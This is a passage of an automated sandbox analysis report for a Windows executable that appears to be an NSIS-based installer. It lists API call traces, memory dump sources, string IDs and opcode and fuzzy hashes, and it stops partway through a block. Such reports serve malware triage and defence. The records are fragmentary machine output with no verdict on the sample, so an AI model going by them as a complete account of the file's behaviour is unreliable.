                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                        • String ID: CopyFiles "%s"->"%s"
                                                        • API String ID: 2577523808-3778932970
                                                        • Opcode ID: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                        • Instruction ID: a779005ae7d6007116ac0765ed120a10e3eb966af121a96df1e98a57451096ba
                                                        • Opcode Fuzzy Hash: f84dc7438b734d649018535b99f5ff883fadf72990f7ea17a428efaae3f8c2d6
                                                        • Instruction Fuzzy Hash: A0112171D00214A6CB10FFBA994699FBBBCEF44354F10843FB506F72D2E6B985118B59
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: lstrcatwsprintf
                                                        • String ID: %02x%c$...
                                                        • API String ID: 3065427908-1057055748
                                                        • Opcode ID: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                        • Instruction ID: b8620b589ecf2e5093343df65250d9ec4fb1615d5218d90249241d8ea01b8719
                                                        • Opcode Fuzzy Hash: ab6e3f364f28889fa0e557be1434f2389f45bfc0df6a8c97b916548b2a1c6c1a
                                                        • Instruction Fuzzy Hash: A2014932500214EFCB10EF58CC84A9EBBE9EB84304F20407AF405F3180D6759EA48794
                                                        APIs
                                                          • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                        • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileStringWritelstrcpyn
                                                        • String ID: <RM>$QuiBookstore$WriteINIStr: wrote [%s] %s=%s in %s
                                                        • API String ID: 247603264-3135320543
                                                        • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                        • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                        • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                        • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD
                                                        APIs
                                                        • OleInitialize.OLE32(00000000), ref: 00405057
                                                          • Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                        • OleUninitialize.OLE32(00000404,00000000), ref: 004050A5
                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: InitializeMessageSendUninitializelstrlenwvsprintf
                                                        • String ID: Section: "%s"$Skipping section: "%s"
                                                        • API String ID: 2266616436-4211696005
                                                        • Opcode ID: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                        • Instruction ID: 490ae00110c0e09774d0d246d4d4a011172e9101669e5a2b786a62fce758e9f8
                                                        • Opcode Fuzzy Hash: e437b8ceb6229a6f9ab503619c9af8890d1bc97808a7dc02d8be9cd793390a3b
                                                        • Instruction Fuzzy Hash: 41F0F4338087009BE6506B64AE07B9B77A4DFD4320F24007FFE48721E1ABFC48818A9D
                                                        APIs
                                                        • GetDC.USER32(?), ref: 00402100
                                                        • GetDeviceCaps.GDI32(00000000), ref: 00402107
                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00402117
                                                          • Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
                                                        • CreateFontIndirectW.GDI32(0041F0F0), ref: 0040216A
                                                          • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: CapsCreateDeviceFontIndirectVersionwsprintf
                                                        • String ID:
                                                        • API String ID: 1599320355-0
                                                        • Opcode ID: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                        • Instruction ID: 656afd6720eca978824560f17fb47cc17b19fb3a621816cfe3730d6e1c8eda21
                                                        • Opcode Fuzzy Hash: 6f0d7b084d37585979e4dd0fd2aac30abed8a2b5fd168dddd791f163065a0eb0
                                                        • Instruction Fuzzy Hash: DA017172644650EFE701ABB4ED4ABDA3BA4A725315F10C43AE645A61E3C678440A8B2D
                                                        APIs
                                                          • Part of subcall function 00406ED2: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407239
                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 0040724A
                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 00407261
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                        • String ID: Version
                                                        • API String ID: 512980652-315105994
                                                        • Opcode ID: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                        • Instruction ID: 151640cc4cfa07bb85738859349229c9473c158da19ee21f10eacb3052f8d035
                                                        • Opcode Fuzzy Hash: 4a1870cd75b7b8bbcc0c4c6a066d827f0aa8b2b5b5f43a101b4d9a41e631e9ca
                                                        • Instruction Fuzzy Hash: 3EF03172A0021CABDB109AA5DD46EEA777CAB44700F100476F600F6191E6B59E158BA5
                                                        APIs
                                                        • DestroyWindow.USER32(00000000,00000000,00403703,00000001,?,?,?,00000000,00403A47,?), ref: 004032E5
                                                        • GetTickCount.KERNEL32 ref: 00403303
                                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A47,?), ref: 0040332E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                        • String ID:
                                                        • API String ID: 2102729457-0
                                                        • Opcode ID: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                        • Instruction ID: 401e6cecbc7a0b9e3d471fb50fe358663bd3ad25f9a7ebc527197863dd5a4904
                                                        • Opcode Fuzzy Hash: 47d4170aef7bfd746f2c3ad407b5e1a24093745f4c41283d4ce41cd21e437078
                                                        • Instruction Fuzzy Hash: 23F08230502620EBC221AF64FE5CBAB7F68FB04B82701447EF545F12A4CB7849928BDC
                                                        APIs
                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 00406370
                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 00406386
                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 00406395
                                                        • GlobalFree.KERNEL32(00000000), ref: 0040639E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                        • String ID:
                                                        • API String ID: 2883127279-0
                                                        • Opcode ID: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                        • Instruction ID: 581917a1a4a7218ca9fbbc4554f9bfb31441e22884f00dccc1ee77d568dea7f2
                                                        • Opcode Fuzzy Hash: 9b9152501c533f071dd2545c5f3fa28dbd06be6ef0eddba5fde26ce4b08cefa4
                                                        • Instruction Fuzzy Hash: 19E048712012107BE2101B669E8CD677EADDFCA7B6B05013EF695F51A0CE348C15D675
                                                        APIs
                                                        • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                        • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Window$EnableShowlstrlenwvsprintf
                                                        • String ID: HideWindow
                                                        • API String ID: 1249568736-780306582
                                                        • Opcode ID: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                        • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                        • Opcode Fuzzy Hash: 2f246f05ebd7dc674da9b5ff0baef701d10e4a3e2a51ec62881f8ce9e704e4b5
                                                        • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                        APIs
                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileStringlstrcmp
                                                        • String ID: !N~
                                                        • API String ID: 623250636-529124213
                                                        • Opcode ID: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                        • Instruction ID: 7cd271610f6b1cb64eb4c57d825f56a096f62725fe87e34e9129affe44791136
                                                        • Opcode Fuzzy Hash: 866873a94fae700ec207294a0f2462ae5c2747d97e8320b74985250fbb79316b
                                                        • Instruction Fuzzy Hash: 37E0E571500208ABDB00BBA0DE85DAE7BBCAF05304F14443AF641F71E3EA7459028718
                                                        APIs
                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                        • CloseHandle.KERNEL32(?), ref: 00405C71
                                                        Strings
                                                        • Error launching installer, xrefs: 00405C48
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: CloseCreateHandleProcess
                                                        • String ID: Error launching installer
                                                        • API String ID: 3712363035-66219284
                                                        • Opcode ID: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                        • Instruction ID: c3c9ba135fb9cbcc5263534f4c07e322ce29f53e9eda4e03cc008bde6a4ec24c
                                                        • Opcode Fuzzy Hash: 47f41dc08d07e361b35e7f66cf96497c8c5e39d775029f064e59fed031f864e7
                                                        • Instruction Fuzzy Hash: 44E0EC70504209ABEF009B64EE49E7F7BBCEB00305F504575BD51E2561D774D9188A68
                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,"C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe",00000000,-00000002,00403876,00403AD1,?), ref: 00403C9D
                                                        • GlobalFree.KERNEL32(?), ref: 00403CA4
                                                        Strings
                                                        • "C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe", xrefs: 00403C95
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: Free$GlobalLibrary
                                                        • String ID: "C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe"
                                                        • API String ID: 1100898210-1955452651
                                                        • Opcode ID: 046f1af9a807a40528e8b39a44fdd4b1d1a0d6b4247cdc0a72410f46df1f4411
                                                        • Instruction ID: e0409796cbff133e4cfb682494846e7286bf672da49bec0b05252ac9bde8f2ee
                                                        • Opcode Fuzzy Hash: 046f1af9a807a40528e8b39a44fdd4b1d1a0d6b4247cdc0a72410f46df1f4411
                                                        • Instruction Fuzzy Hash: 05E012338096209BDA315F15EE0875A7B68BF45B77F06012EE8C0BB3A487745C4186D8
                                                        APIs
                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004035F3,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe,C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00406757
                                                        • CharPrevW.USER32(80000000,00000000,?,?,?,00000000,00403A47,?), ref: 00406768
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.00000000004DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2031036748.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.jbxd
                                                        Similarity
                                                        • API ID: CharPrevlstrlen
                                                        • String ID: C:\Users\user\Desktop
                                                        • API String ID: 2709904686-1246513382
                                                        • Opcode ID: b7fdc044305c70bb42687b7f0662e1e6e1c83cc406910596c01fe4bf7230c37e
                                                        • Instruction ID: 578b036f622d94ce9a8c11ae272008c7950a84950c1f81d8e7c2595e1eaad068
                                                        • Opcode Fuzzy Hash: b7fdc044305c70bb42687b7f0662e1e6e1c83cc406910596c01fe4bf7230c37e
                                                        • Instruction Fuzzy Hash: B0D05E310005209BC7126B28DF45CAF77BCEF41700346446EF042E7170CB385D9287AD
                                                        APIs
                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                          • Part of subcall function 004060E7: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2030802534.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.2030760893.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030826533.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2030878778.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
